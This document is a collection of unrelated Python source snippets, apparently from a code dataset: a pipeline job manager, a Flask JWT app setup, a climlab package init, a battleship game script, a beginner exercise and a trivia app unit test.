name (str): name of the thread
Returns:
thread (obj)
Raises:
raises an assert error if the thead does not exist
"""
assert name in self._thread_index, "No thread named {}".format( name )
return self._threads[ self._thread_index[ name ]]
def submit_job(self, cmd, step_name, output=None, limit=None, delete_file=None, thread_id=None, system_call=False):
""" Submits a job using the selected backend, setting up the tracking and all that jazz
Args:
cmd (str): command to run
step_name (str): name of the step that this command belongs to
output (str): output information to pass on to the next job
limit (str): paramters to pass on to the backend
delete_file (str): File(s) to delete if the job is successful
thread_id (int): id of the thread running this
system_call (bool): run the job as a system job (default: false )
Returns:
None
"""
job = Job(cmd, step_name, output, limit, delete_file, thread_id)
self._jobs.append( job )
job.job_id = len( self._jobs) - 1
# print( "Working on: '{}' -> {}".format( job.step_name, job.cmd ))
if ( system_call ) :
job = self.local_backend.system_call( job )
else:
job = self.backend.submit( job )
# print( job.status )
def resubmit_job(self, job):
""" resubmits a job
Args:
job (job): jobid to resubmit
"""
job.nr_of_tries += 1
job.status = Job_status.RESUBMITTED
job = self.backend.submit( job )
def killall(self):
"""kills all submitted/running jobs
"""
for job_id, job in self.jobs:
backend.kill( job )
def job_outputs( self, step_name=None):
"""
Args:
step_name (str): name of the step to collect outputs from
Returns:
list of outputs
"""
outputs = []
prev_steps = self.pipeline._workflow.prev_steps( step_name )
# print("{} :: Prev steps to collect outputs from: {}".format( step_name, prev_steps))
for job in self._jobs:
if job.step_name in prev_steps:
outputs.append( job.output )
# print("{}".format( outputs))
return outputs
def format_memory(self, memory):
""" Format memory into a more readable format
Args:
memory (int): will be cast to float anyway
Returns
Readable memory (str)
"""
memory = float( memory)
if memory is None or memory == 0:
return "N/A"
elif ( memory > 1000000000):
return "{:.2f}GB".format(memory / 1000000000)
elif ( memory > 1000000):
return "{:.2f}MB".format(memory / 1000000)
elif ( memory > 1000):
return "{:.2f}KB".format(memory / 1000)
else:
return "{:}".format(int(memory))
def format_time( self, seconds):
""" Markes seconds into a more readable format eg: 10:03:01
Args
Seconds (int): seconds to convert into hours:mins:seconds
returns:
time (str)
"""
if seconds is None:
return "N/A"
seconds = int( seconds )
hours = int(seconds / 3600)
seconds -= hours * 3600
minutes = int(seconds / 60)
seconds -= minutes * 60
seconds = int(seconds )
return "{:02}:{:02}:{:02}".format( hours, minutes, seconds)
def report(self):
""" print the current progress
Args:
None
Returns:
None
"""
job_summary = {}
for job in self._jobs:
if job.step_name not in job_summary:
job_summary[ job.step_name ] = {}
job_summary[ job.step_name ][ 'DONE' ] = 0
job_summary[ job.step_name ][ 'RUNNING' ] = 0
job_summary[ job.step_name ][ 'QUEUING' ] = 0
job_summary[ job.step_name ][ 'FAILED' ] = 0
job_summary[ job.step_name ][ 'UNKNOWN' ] = 0
job_summary[ job.step_name ][ 'max_mem' ] = 0
job_summary[ job.step_name ][ 'cputime' ] = 0
if job.status == Job_status.FINISHED:
job_summary[ job.step_name ][ 'DONE' ] += 1
if job.cputime is not None:
job_summary[ job.step_name ]['cputime'] += int(job.cputime)
if job.max_memory is not None and job.max_memory > job_summary[ job.step_name ][ 'max_mem']:
job_summary[ job.step_name ][ 'max_mem'] = int(job.max_memory)
elif job.status == Job_status.RUNNING:
job_summary[ job.step_name ][ 'RUNNING' ] += 1
elif job.status == Job_status.QUEUEING or job.status == Job_status.SUBMITTED:
job_summary[ job.step_name ][ 'QUEUING' ] += 1
elif job.status == Job_status.FAILED or job.status == Job_status.NO_RESTART:
job_summary[ job.step_name ][ 'FAILED' ] += 1
else:
job_summary[ job.step_name ][ 'UNKNOWN' ] += 1
local_time = strftime("%d/%m/%Y %H:%M", time.localtime())
pickle_file = "{}.{}".format(self.pipeline.project_name, self.pipeline._pid)
print("[{} @{} {}]".format( local_time,self.pipeline._hostname , pickle_file))
print("{:20} || {:12} || {:12} || {:2s} {:2s} {:2s} {:2s} {:2s}".format("Run stats", "Runtime", "Max Mem", "D","R","Q","F","U"))
for step in sorted(self.pipeline._workflow._analysis_order, key=self.pipeline._workflow._analysis_order.__getitem__):
if step not in job_summary:
continue
print("{:20} || {:12} || {:12} || {:02d}/{:02d}/{:02d}/{:02d}/{:02d}".format(step,
self.format_time(job_summary[ step ]['cputime']),
self.format_memory(job_summary[ step ]['max_mem']),
job_summary[ step ][ 'DONE' ],
job_summary[ step ][ 'RUNNING' ],
job_summary[ step ][ 'QUEUING' ],
job_summary[ step ][ 'FAILED' ],
job_summary[ step ][ 'UNKNOWN' ]))
def active_jobs(self):
""" updates the status of and returns all active jobs
Args:
None
Returns:
list of jobs (obj)
"""
active_jobs = []
for job in self._jobs:
if job.active:
job.backend.status( job )
active_jobs.append( job )
self._active_jobs = active_jobs[:]
return active_jobs
def waiting_for_job(self, depends_on ):
""" check if any of the running jobs are in the depends list
Args:
depends_on (list obj): list of steps to check again
Returns:
boolean, True if outstanding dependencies
"""
# This code is aweful, but I don't have to time and brain
# power to fix it right now
for depend_on in depends_on:
for active_job in self._active_jobs:
if (active_job.active and
depend_on.name == active_job.step_name ):
# print("waiting on {}".format(active_job.step_name))
return True
for depend_on in depends_on:
job_found = False
for job in self._jobs:
if (depend_on.name == job.step_name ):
job_found = True
if not job_found:
print("{} is waiting to start and finish {}".format( job.step_name, depend_on.name ))
return True
# We are not waiting for any active or steps yet to be performed
return False
def failed_dependency_jobs(self, depends_on ):
""" check if any of the running jobs this one depends on have failed.
Args:
depends_on (list obj): list of steps to check again
Returns:
boolean, True if one or more job has failed and cannot be restarted
"""
for depend_on in depends_on:
for active_job in self._active_jobs:
if (active_job.status == Job_status.NO_RESTART):
print("dependecy {} failed".format(active_job.step_name))
return True
return False
def _next_id():
''' generates and returns the next job id from the class
Returns:
Next available job id (int)
'''
self.job_id += 1
return self.job_id
|
normal
|
{
"blob_id": "222a02f97df5ded6fea49e9eb201ed784a2a2423",
"index": 5037,
"step-1": "#\n# \n# \n##\n\nfrom __future__ import print_function, unicode_literals\nimport inspect\nimport os\nimport pprint as pp\nimport time\nfrom time import gmtime, strftime\nimport subprocess\n\nfrom local import *\nfrom slurm import *\n\nclass Job_status( object ):\n \"\"\" Enumerate class for job statuses, this is done differently in python 3\n\n \"\"\"\n FINISHED = 1\n FAILED = 2\n NO_RESTART = 3\n RUNNING = 4\n QUEUEING = 5\n RESUBMITTED = 6\n SUBMITTED = 7\n CREATED = 98\n KILLED = 99\n UNKNOWN = 100\n\n\nclass Job(object):\n \"\"\" This class is presenting a singular job and all information associated with it. \n\n \"\"\"\n\n\n def __init__(self, cmd, step_name, output=None, limit=None, delete_file=None, thread_id=None):\n \"\"\" Create a job object\n \n Args:\n cmd (str): command to run\n step_name (str): name of the step that this command belongs to\n output (str): output information to pass on to the next job\n limit (str): paramters to pass on to the backend\n delete_file (str): File(s) to delete if the job is successful\n thread_id (int): id of the thread running this \n\n Returns:\n job (obj)\n \"\"\"\n\n self.status = Job_status.CREATED\n self.active = True\n self.command = None\n self.backend = None\n\n self.output = output\n self.step_name = None\n self.pre_task_ids = None\n self.delete_file = None\n self.job_id = None\n self.backend_id = None\n self.nr_of_tries = 0\n\n self.cmd = cmd\n self.step_name = step_name\n self.max_memory = None\n self.cputime = None\n\n\n if ( limit is not None ):\n self.limit = limit\n\n if ( delete_file is not None ):\n self.delete_file = delete_file\n\n if ( thread_id is not None ):\n self.thread_id = thread_id\n\n\n def __getitem__(self, item):\n \"\"\" Generic getter function\n\n Raises:\n AttributeError is raised if trying to access value starting with _ or unknown value\n \"\"\"\n \n if ( item.startswith(\"_\")):\n raise AttributeError\n\n try:\n return getattr(self, item)\n except KeyError:\n raise AttributeError\n\n def __setitem__(self, item, value):\n \"\"\" Generic setter function\n\n Raises:\n AttributeError is raised if trying to access value starting with _ or unknown value\n \"\"\"\n\n if ( item.startswith(\"_\")):\n raise AttributeError\n \n try:\n return setattr(self, item, value)\n except KeyError:\n raise AttributeError\n\n def __repr__(self):\n return \"{name} -> {status}\".format( name=self.step_name, status=self.status )\n\n def __str__(self):\n return \"{name}\".format( name=self.step_name )\n\n \n def delete_tmp_files(self):\n \"\"\" deletes tmp files \n\n Args:\n None\n\n Returns:\n boolean: Success/failure\n\n Raises:\n None\n \"\"\"\n\n if self.delete_file is None:\n return True\n\n if ( isinstance(self.delete_file, str)):\n self.delete_file = [ self.delete_file ] \n \n for file_name in self.delete_file:\n print( file_name)\n if ( os.path.isfile( file_name )):\n os.remove( file_name )\n \n return True\n \n\n\nclass Thread( object):\n\n def __init__( self, name, thread_id ):\n self.name = name\n self.thread_id = thread_id\n \n\n def __getitem__(self, item):\n \"\"\" Generic getter function\n\n Raises:\n AttributeError is raised if trying to access value starting with _ or unknown value\n \"\"\"\n \n if ( item.startswith(\"_\")):\n raise AttributeError\n\n try:\n return getattr(self, item)\n except KeyError:\n raise AttributeError\n\n def __setitem__(self, item, value):\n \"\"\" Generic setter function\n\n Raises:\n AttributeError is raised if trying to access value starting with _ or unknown value\n \"\"\"\n\n if ( item.startswith(\"_\")):\n raise AttributeError\n \n try:\n return setattr(self, item, value)\n except KeyError:\n raise AttributeError\n\n\nclass Manager( object ):\n\n\n def __init__(self, pipeline):\n \"\"\" Creates a manager object\n\n \"\"\"\n self._jobs = []\n self._active_jobs = []\n\n self._threads = []\n self._thread_index = {}\n self._thread_id = 1\n\n\n self.local_backend = Local()\n self.backend = None\n\n self.pipeline = pipeline\n\n\n def __getitem__(self, item):\n \"\"\" Generic getter function\n\n Raises:\n AttributeError is raised if trying to access value starting with _ or unknown value\n \"\"\"\n \n if ( item.startswith(\"_\")):\n raise AttributeError\n\n try:\n return getattr(self, item)\n except KeyError:\n raise AttributeError\n\n def __setitem__(self, item, value):\n \"\"\" Generic setter function\n\n Raises:\n AttributeError is raised if trying to access value starting with _ or unknown value\n \"\"\"\n\n if ( item.startswith(\"_\")):\n raise AttributeError\n \n try:\n return setattr(self, item, value)\n except KeyError:\n raise AttributeError\n\n def add_thread(self, name):\n \"\"\" Create a new thread object for the manager\n\n Args:\n name (str): name of the thread\n\n Returns:\n None\n\n \"\"\"\n\n thread = Thread( name=name, thread_id=self._thread_id)\n self._threads.append( thread )\n self._thread_index[ name ] = self._thread_id \n\n self._thread_id += 1\n\n\n def get_thread_by_name( self, name):\n \"\"\" gets a thread object based on name\n\n Args:\n name (str): name of the thread\n\n Returns:\n thread (obj)\n\n Raises:\n raises an assert error if the thead does not exist\n\n \"\"\"\n\n assert name in self._thread_index, \"No thread named {}\".format( name )\n\n return self._threads[ self._thread_index[ name ]]\n\n\n \n def submit_job(self, cmd, step_name, output=None, limit=None, delete_file=None, thread_id=None, system_call=False):\n \"\"\" Submits a job using the selected backend, setting up the tracking and all that jazz\n \n Args:\n cmd (str): command to run\n step_name (str): name of the step that this command belongs to\n output (str): output information to pass on to the next job\n limit (str): paramters to pass on to the backend\n delete_file (str): File(s) to delete if the job is successful\n thread_id (int): id of the thread running this \n system_call (bool): run the job as a system job (default: false )\n\n Returns:\n None\n \n \"\"\"\n\n job = Job(cmd, step_name, output, limit, delete_file, thread_id)\n self._jobs.append( job )\n job.job_id = len( self._jobs) - 1\n\n# print( \"Working on: '{}' -> {}\".format( job.step_name, job.cmd ))\n\n if ( system_call ) :\n job = self.local_backend.system_call( job )\n else:\n job = self.backend.submit( job )\n\n# print( job.status )\n \n\n \n def resubmit_job(self, job):\n \"\"\" resubmits a job\n \n Args:\n job (job): jobid to resubmit\n\n \"\"\"\n\n job.nr_of_tries += 1\n job.status = Job_status.RESUBMITTED\n job = self.backend.submit( job )\n\n\n def killall(self):\n \"\"\"kills all submitted/running jobs\n \n \"\"\"\n\n for job_id, job in self.jobs:\n backend.kill( job )\n\n\n\n def job_outputs( self, step_name=None):\n \"\"\"\n \n Args:\n step_name (str): name of the step to collect outputs from\n\n Returns:\n list of outputs\n\n \"\"\"\n\n outputs = []\n prev_steps = self.pipeline._workflow.prev_steps( step_name )\n# print(\"{} :: Prev steps to collect outputs from: {}\".format( step_name, prev_steps))\n for job in self._jobs:\n if job.step_name in prev_steps:\n outputs.append( job.output )\n\n\n# print(\"{}\".format( outputs))\n return outputs\n\n\n def format_memory(self, memory):\n \"\"\" Format memory into a more readable format\n\n Args:\n memory (int): will be cast to float anyway\n\n Returns\n Readable memory (str)\n \"\"\"\n\n memory = float( memory) \n\n if memory is None or memory == 0:\n return \"N/A\"\n elif ( memory > 1000000000):\n return \"{:.2f}GB\".format(memory / 1000000000)\n elif ( memory > 1000000):\n return \"{:.2f}MB\".format(memory / 1000000) \n elif ( memory > 1000):\n return \"{:.2f}KB\".format(memory / 1000) \n else:\n return \"{:}\".format(int(memory))\n\n\n\n def format_time( self, seconds):\n \"\"\" Markes seconds into a more readable format eg: 10:03:01\n\n Args\n Seconds (int): seconds to convert into hours:mins:seconds\n\n returns:\n time (str)\n \"\"\"\n\n if seconds is None:\n return \"N/A\"\n\n seconds = int( seconds )\n\n hours = int(seconds / 3600)\n seconds -= hours * 3600\n\n minutes = int(seconds / 60)\n seconds -= minutes * 60\n seconds = int(seconds )\n\n\n return \"{:02}:{:02}:{:02}\".format( hours, minutes, seconds)\n\n\n\n def report(self):\n \"\"\" print the current progress\n Args:\n None\n\n Returns:\n None\n\n \"\"\"\n\n job_summary = {}\n for job in self._jobs:\n \n if job.step_name not in job_summary:\n job_summary[ job.step_name ] = {}\n job_summary[ job.step_name ][ 'DONE' ] = 0\n job_summary[ job.step_name ][ 'RUNNING' ] = 0\n job_summary[ job.step_name ][ 'QUEUING' ] = 0\n job_summary[ job.step_name ][ 'FAILED' ] = 0\n job_summary[ job.step_name ][ 'UNKNOWN' ] = 0\n job_summary[ job.step_name ][ 'max_mem' ] = 0\n job_summary[ job.step_name ][ 'cputime' ] = 0\n\n if job.status == Job_status.FINISHED:\n job_summary[ job.step_name ][ 'DONE' ] += 1\n if job.cputime is not None:\n job_summary[ job.step_name ]['cputime'] += int(job.cputime)\n\n if job.max_memory is not None and job.max_memory > job_summary[ job.step_name ][ 'max_mem']:\n job_summary[ job.step_name ][ 'max_mem'] = int(job.max_memory)\n\n elif job.status == Job_status.RUNNING:\n job_summary[ job.step_name ][ 'RUNNING' ] += 1\n elif job.status == Job_status.QUEUEING or job.status == Job_status.SUBMITTED:\n job_summary[ job.step_name ][ 'QUEUING' ] += 1\n elif job.status == Job_status.FAILED or job.status == Job_status.NO_RESTART:\n job_summary[ job.step_name ][ 'FAILED' ] += 1\n else:\n job_summary[ job.step_name ][ 'UNKNOWN' ] += 1\n\n\n\n local_time = strftime(\"%d/%m/%Y %H:%M\", time.localtime())\n \n\n pickle_file = \"{}.{}\".format(self.pipeline.project_name, self.pipeline._pid)\n\n print(\"[{} @{} {}]\".format( local_time,self.pipeline._hostname , pickle_file))\n\n print(\"{:20} || {:12} || {:12} || {:2s} {:2s} {:2s} {:2s} {:2s}\".format(\"Run stats\", \"Runtime\", \"Max Mem\", \"D\",\"R\",\"Q\",\"F\",\"U\"))\n\n for step in sorted(self.pipeline._workflow._analysis_order, key=self.pipeline._workflow._analysis_order.__getitem__):\n if step not in job_summary:\n continue\n\n print(\"{:20} || {:12} || {:12} || {:02d}/{:02d}/{:02d}/{:02d}/{:02d}\".format(step, \n self.format_time(job_summary[ step ]['cputime']),\n self.format_memory(job_summary[ step ]['max_mem']),\n job_summary[ step ][ 'DONE' ],\n job_summary[ step ][ 'RUNNING' ],\n job_summary[ step ][ 'QUEUING' ],\n job_summary[ step ][ 'FAILED' ],\n job_summary[ step ][ 'UNKNOWN' ]))\n \n\n \n\n\n\n def active_jobs(self):\n \"\"\" updates the status of and returns all active jobs \n\n Args:\n None\n\n Returns:\n list of jobs (obj)\n \n \"\"\"\n \n active_jobs = []\n for job in self._jobs:\n if job.active:\n job.backend.status( job )\n active_jobs.append( job )\n\n self._active_jobs = active_jobs[:]\n\n return active_jobs\n\n\n def waiting_for_job(self, depends_on ):\n \"\"\" check if any of the running jobs are in the depends list \n\n Args:\n depends_on (list obj): list of steps to check again\n\n Returns:\n boolean, True if outstanding dependencies\n\n \"\"\"\n\n # This code is aweful, but I don't have to time and brain\n # power to fix it right now\n\n for depend_on in depends_on:\n for active_job in self._active_jobs:\n if (active_job.active and \n depend_on.name == active_job.step_name ):\n# print(\"waiting on {}\".format(active_job.step_name))\n return True\n\n\n\n for depend_on in depends_on:\n job_found = False\n for job in self._jobs:\n if (depend_on.name == job.step_name ):\n job_found = True\n\n if not job_found:\n print(\"{} is waiting to start and finish {}\".format( job.step_name, depend_on.name ))\n return True\n\n\n # We are not waiting for any active or steps yet to be performed\n return False\n\n\n\n def failed_dependency_jobs(self, depends_on ):\n \"\"\" check if any of the running jobs this one depends on have failed.\n\n Args:\n depends_on (list obj): list of steps to check again\n\n Returns:\n boolean, True if one or more job has failed and cannot be restarted\n\n \"\"\"\n\n for depend_on in depends_on:\n for active_job in self._active_jobs:\n if (active_job.status == Job_status.NO_RESTART):\n print(\"dependecy {} failed\".format(active_job.step_name))\n return True\n\n return False\n \n\n\n\n def _next_id():\n\t''' generates and returns the next job id from the class\n\n\tReturns:\n Next available job id (int)\n\n\t'''\n self.job_id += 1\n\n return self.job_id\n\n\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from flask import Flask
from flask_bcrypt import Bcrypt
from flask_jwt_extended import JWTManager
from flask_migrate import Migrate
from flask_restful import Api
from flask_apispec.extension import FlaskApiSpec
from server.admin import add_admin
from server.config import Config
from server.db import db
from server.cli import add_commands
from server.login_manager import login_manager
from server.resources import add_routes, register_docs
from server.services import user_service, token_blacklist
app = Flask(__name__)
app.config.from_object(Config)
db.init_app(app)
migrate = Migrate(app, db)
admin = add_admin(app)
api = Api(app, catch_all_404s=True)
jwt = JWTManager(app)
bcrypt = Bcrypt(app)
@jwt.user_lookup_loader
def user_loader_callback(_jwt_header, jwt_data):
return user_service.first(id=jwt_data['sub'])
@jwt.user_identity_loader
def user_identity_lookup(email):
return user_service.first(email=email).id
@jwt.token_in_blocklist_loader
def check_if_token_in_blocklist(jwt_headers, jwt_payload):
return bool(token_blacklist.get(jwt_payload['jti']))
def create_app():
add_routes(api)
add_commands(app)
login_manager.init_app(app)
docs = FlaskApiSpec(app)
register_docs(docs)
return app
|
normal
|
{
"blob_id": "f1d813ccaf49c8941bf594e22d8683c0ab422a22",
"index": 7632,
"step-1": "<mask token>\n\n\[email protected]_lookup_loader\ndef user_loader_callback(_jwt_header, jwt_data):\n return user_service.first(id=jwt_data['sub'])\n\n\[email protected]_identity_loader\ndef user_identity_lookup(email):\n return user_service.first(email=email).id\n\n\[email protected]_in_blocklist_loader\ndef check_if_token_in_blocklist(jwt_headers, jwt_payload):\n return bool(token_blacklist.get(jwt_payload['jti']))\n\n\ndef create_app():\n add_routes(api)\n add_commands(app)\n login_manager.init_app(app)\n docs = FlaskApiSpec(app)\n register_docs(docs)\n return app\n",
"step-2": "<mask token>\napp.config.from_object(Config)\ndb.init_app(app)\n<mask token>\n\n\[email protected]_lookup_loader\ndef user_loader_callback(_jwt_header, jwt_data):\n return user_service.first(id=jwt_data['sub'])\n\n\[email protected]_identity_loader\ndef user_identity_lookup(email):\n return user_service.first(email=email).id\n\n\[email protected]_in_blocklist_loader\ndef check_if_token_in_blocklist(jwt_headers, jwt_payload):\n return bool(token_blacklist.get(jwt_payload['jti']))\n\n\ndef create_app():\n add_routes(api)\n add_commands(app)\n login_manager.init_app(app)\n docs = FlaskApiSpec(app)\n register_docs(docs)\n return app\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config.from_object(Config)\ndb.init_app(app)\nmigrate = Migrate(app, db)\nadmin = add_admin(app)\napi = Api(app, catch_all_404s=True)\njwt = JWTManager(app)\nbcrypt = Bcrypt(app)\n\n\[email protected]_lookup_loader\ndef user_loader_callback(_jwt_header, jwt_data):\n return user_service.first(id=jwt_data['sub'])\n\n\[email protected]_identity_loader\ndef user_identity_lookup(email):\n return user_service.first(email=email).id\n\n\[email protected]_in_blocklist_loader\ndef check_if_token_in_blocklist(jwt_headers, jwt_payload):\n return bool(token_blacklist.get(jwt_payload['jti']))\n\n\ndef create_app():\n add_routes(api)\n add_commands(app)\n login_manager.init_app(app)\n docs = FlaskApiSpec(app)\n register_docs(docs)\n return app\n",
"step-4": "from flask import Flask\nfrom flask_bcrypt import Bcrypt\nfrom flask_jwt_extended import JWTManager\nfrom flask_migrate import Migrate\nfrom flask_restful import Api\nfrom flask_apispec.extension import FlaskApiSpec\nfrom server.admin import add_admin\nfrom server.config import Config\nfrom server.db import db\nfrom server.cli import add_commands\nfrom server.login_manager import login_manager\nfrom server.resources import add_routes, register_docs\nfrom server.services import user_service, token_blacklist\napp = Flask(__name__)\napp.config.from_object(Config)\ndb.init_app(app)\nmigrate = Migrate(app, db)\nadmin = add_admin(app)\napi = Api(app, catch_all_404s=True)\njwt = JWTManager(app)\nbcrypt = Bcrypt(app)\n\n\[email protected]_lookup_loader\ndef user_loader_callback(_jwt_header, jwt_data):\n return user_service.first(id=jwt_data['sub'])\n\n\[email protected]_identity_loader\ndef user_identity_lookup(email):\n return user_service.first(email=email).id\n\n\[email protected]_in_blocklist_loader\ndef check_if_token_in_blocklist(jwt_headers, jwt_payload):\n return bool(token_blacklist.get(jwt_payload['jti']))\n\n\ndef create_app():\n add_routes(api)\n add_commands(app)\n login_manager.init_app(app)\n docs = FlaskApiSpec(app)\n register_docs(docs)\n return app\n",
"step-5": null,
"step-ids": [
4,
5,
6,
7
]
}
|
[
4,
5,
6,
7
] |
__version__ = '0.2.11'
# This list defines all the modules that will be loaded if a user invokes
# from climLab import *
# totally out of date!
#__all__ = ["constants", "thermo", "orbital_table",
# "long_orbital_table", "insolation", "ebm",
# "column", "convadj"]
#from climlab import radiation
# this should ensure that we can still import constants.py as climlab.constants
from climlab.utils import constants
from climlab.utils import thermo, legendre
# some more useful shorcuts
#from climlab.model import ebm, column
from climlab.model.column import GreyRadiationModel, RadiativeConvectiveModel, BandRCModel
from climlab.model.ebm import EBM, EBM_annual, EBM_seasonal
from climlab.domain import domain
from climlab.domain.field import Field, global_mean
from climlab.domain.axis import Axis
from climlab.process.process import Process, process_like, get_axes
from climlab.process.time_dependent_process import TimeDependentProcess
from climlab.process.implicit import ImplicitProcess
from climlab.process.diagnostic import DiagnosticProcess
from climlab.process.energy_budget import EnergyBudget
|
normal
|
{
"blob_id": "8251a9c798b3cdc2f374d0a0406ccfaa11b7c5e3",
"index": 5699,
"step-1": "<mask token>\n",
"step-2": "__version__ = '0.2.11'\n<mask token>\n",
"step-3": "__version__ = '0.2.11'\nfrom climlab.utils import constants\nfrom climlab.utils import thermo, legendre\nfrom climlab.model.column import GreyRadiationModel, RadiativeConvectiveModel, BandRCModel\nfrom climlab.model.ebm import EBM, EBM_annual, EBM_seasonal\nfrom climlab.domain import domain\nfrom climlab.domain.field import Field, global_mean\nfrom climlab.domain.axis import Axis\nfrom climlab.process.process import Process, process_like, get_axes\nfrom climlab.process.time_dependent_process import TimeDependentProcess\nfrom climlab.process.implicit import ImplicitProcess\nfrom climlab.process.diagnostic import DiagnosticProcess\nfrom climlab.process.energy_budget import EnergyBudget\n",
"step-4": "__version__ = '0.2.11'\n\n# This list defines all the modules that will be loaded if a user invokes\n# from climLab import *\n\n# totally out of date!\n\n#__all__ = [\"constants\", \"thermo\", \"orbital_table\",\n# \"long_orbital_table\", \"insolation\", \"ebm\",\n# \"column\", \"convadj\"]\n\n#from climlab import radiation\n# this should ensure that we can still import constants.py as climlab.constants \nfrom climlab.utils import constants\nfrom climlab.utils import thermo, legendre\n# some more useful shorcuts\n#from climlab.model import ebm, column\nfrom climlab.model.column import GreyRadiationModel, RadiativeConvectiveModel, BandRCModel\nfrom climlab.model.ebm import EBM, EBM_annual, EBM_seasonal\nfrom climlab.domain import domain\nfrom climlab.domain.field import Field, global_mean\nfrom climlab.domain.axis import Axis\nfrom climlab.process.process import Process, process_like, get_axes\nfrom climlab.process.time_dependent_process import TimeDependentProcess\nfrom climlab.process.implicit import ImplicitProcess\nfrom climlab.process.diagnostic import DiagnosticProcess\nfrom climlab.process.energy_budget import EnergyBudget\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
print("Leer 10 números enteros, almacenarlos en un vector y determinar en qué posiciones se encuentran los números con mas de 3 dígitos")
count=1
lista=[]
while count<11:
numero=int(input('Introduzca su %d numero:' %(count)))
lista.append(numero)
count=count+1
listanueva=[]
s= ','
for element in lista:
if element > 999 or element<-999:
listanueva.append(lista.index(element))
posiciones= ','.join(str (x) for x in listanueva)
print("Los numeros con mas de tres digitos se encuentran en las posiciones",posiciones)
input()
|
normal
|
{
"blob_id": "9dd5db441044c808274493f16a912d1b65a6c28b",
"index": 5911,
"step-1": "<mask token>\n",
"step-2": "print(\n 'Leer 10 números enteros, almacenarlos en un vector y determinar en qué posiciones se encuentran los números con mas de 3 dígitos'\n )\n<mask token>\nwhile count < 11:\n numero = int(input('Introduzca su %d numero:' % count))\n lista.append(numero)\n count = count + 1\n<mask token>\nfor element in lista:\n if element > 999 or element < -999:\n listanueva.append(lista.index(element))\n<mask token>\nprint('Los numeros con mas de tres digitos se encuentran en las posiciones',\n posiciones)\ninput()\n",
"step-3": "print(\n 'Leer 10 números enteros, almacenarlos en un vector y determinar en qué posiciones se encuentran los números con mas de 3 dígitos'\n )\ncount = 1\nlista = []\nwhile count < 11:\n numero = int(input('Introduzca su %d numero:' % count))\n lista.append(numero)\n count = count + 1\nlistanueva = []\ns = ','\nfor element in lista:\n if element > 999 or element < -999:\n listanueva.append(lista.index(element))\nposiciones = ','.join(str(x) for x in listanueva)\nprint('Los numeros con mas de tres digitos se encuentran en las posiciones',\n posiciones)\ninput()\n",
"step-4": "print(\"Leer 10 números enteros, almacenarlos en un vector y determinar en qué posiciones se encuentran los números con mas de 3 dígitos\")\r\n\r\n\r\ncount=1\r\nlista=[]\r\nwhile count<11: \r\n numero=int(input('Introduzca su %d numero:' %(count)))\r\n lista.append(numero)\r\n count=count+1\r\nlistanueva=[]\r\ns= ','\r\n \r\nfor element in lista:\r\n\r\n if element > 999 or element<-999:\r\n listanueva.append(lista.index(element))\r\n\r\nposiciones= ','.join(str (x) for x in listanueva)\r\nprint(\"Los numeros con mas de tres digitos se encuentran en las posiciones\",posiciones)\r\ninput()",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from battleship.board import Board
from battleship.game import Game
import string
# Board
row_num = list(string.ascii_lowercase[:10]) # A-J
col_num = 10
board = Board(row_num, col_num)
board.display_board()
# Game
guesses = 25
quit = 'q'
game = Game(guesses, quit)
game.take_shot("\nChoose a spot to fire at in enemy seas: ", board)
# Ships
# 2x submarine = 1
# 2x destroyer = 2
# 1x cruiser = 3
# 1x battleship = 4
# 1x carrier = 5
|
normal
|
{
"blob_id": "dd06847c3eb9af6e84f247f8f0dd03961d83688e",
"index": 9453,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nboard.display_board()\n<mask token>\ngame.take_shot(\"\"\"\nChoose a spot to fire at in enemy seas: \"\"\", board)\n",
"step-3": "<mask token>\nrow_num = list(string.ascii_lowercase[:10])\ncol_num = 10\nboard = Board(row_num, col_num)\nboard.display_board()\nguesses = 25\nquit = 'q'\ngame = Game(guesses, quit)\ngame.take_shot(\"\"\"\nChoose a spot to fire at in enemy seas: \"\"\", board)\n",
"step-4": "from battleship.board import Board\nfrom battleship.game import Game\nimport string\nrow_num = list(string.ascii_lowercase[:10])\ncol_num = 10\nboard = Board(row_num, col_num)\nboard.display_board()\nguesses = 25\nquit = 'q'\ngame = Game(guesses, quit)\ngame.take_shot(\"\"\"\nChoose a spot to fire at in enemy seas: \"\"\", board)\n",
"step-5": "from battleship.board import Board\nfrom battleship.game import Game\n\nimport string\n\n# Board\nrow_num = list(string.ascii_lowercase[:10]) # A-J\ncol_num = 10\nboard = Board(row_num, col_num) \nboard.display_board()\n\n# Game\nguesses = 25\nquit = 'q'\ngame = Game(guesses, quit)\ngame.take_shot(\"\\nChoose a spot to fire at in enemy seas: \", board)\n\n# Ships\n# 2x submarine = 1\n# 2x destroyer = 2\n# 1x cruiser = 3\n# 1x battleship = 4\n# 1x carrier = 5\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import os
import unittest
import json
from flask_sqlalchemy import SQLAlchemy
from flaskr import create_app
from models import setup_db, Question
DB_HOST = os.getenv('DB_HOST', '127.0.0.1:5432')
DB_USER = os.getenv('DB_USER', 'postgres')
DB_PASSWORD = os.getenv('DB_PASSWORD', 'postgres')
DB_NAME = os.getenv('DB_NAME', 'trivia_test')
DB_PATH = 'postgresql+psycopg2://{}:{}@{}/{}'.\
format(DB_USER, DB_PASSWORD, DB_HOST, DB_NAME)
class TriviaTestCase(unittest.TestCase):
"""This class represents the trivia test case"""
def setUp(self):
"""Define test variables and initialize app."""
self.app = create_app()
self.client = self.app.test_client
self.database_path = DB_PATH
setup_db(self.app, self.database_path)
self.question_to_delete = Question(
question='What?',
answer='huh!',
category=1,
difficulty=1
)
self.new_question = {
'question': 'What?',
'answer': 'What',
'category': 1,
'difficulty': 1
}
self.quizz = {
'previous_questions': [1, 3],
'quiz_category': {'id': 1, 'type': 'Science'}
}
# binds the app to the current context
with self.app.app_context():
self.db = SQLAlchemy()
self.db.init_app(self.app)
# create all tables
self.db.create_all()
def tearDown(self):
"""Executed after reach test"""
pass
def test_get_categories_if_success(self):
res = self.client().get('/categories')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['categories'])
def test_get_categories_if_non_existing_category(self):
res = self.client().get('/categories/10000')
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
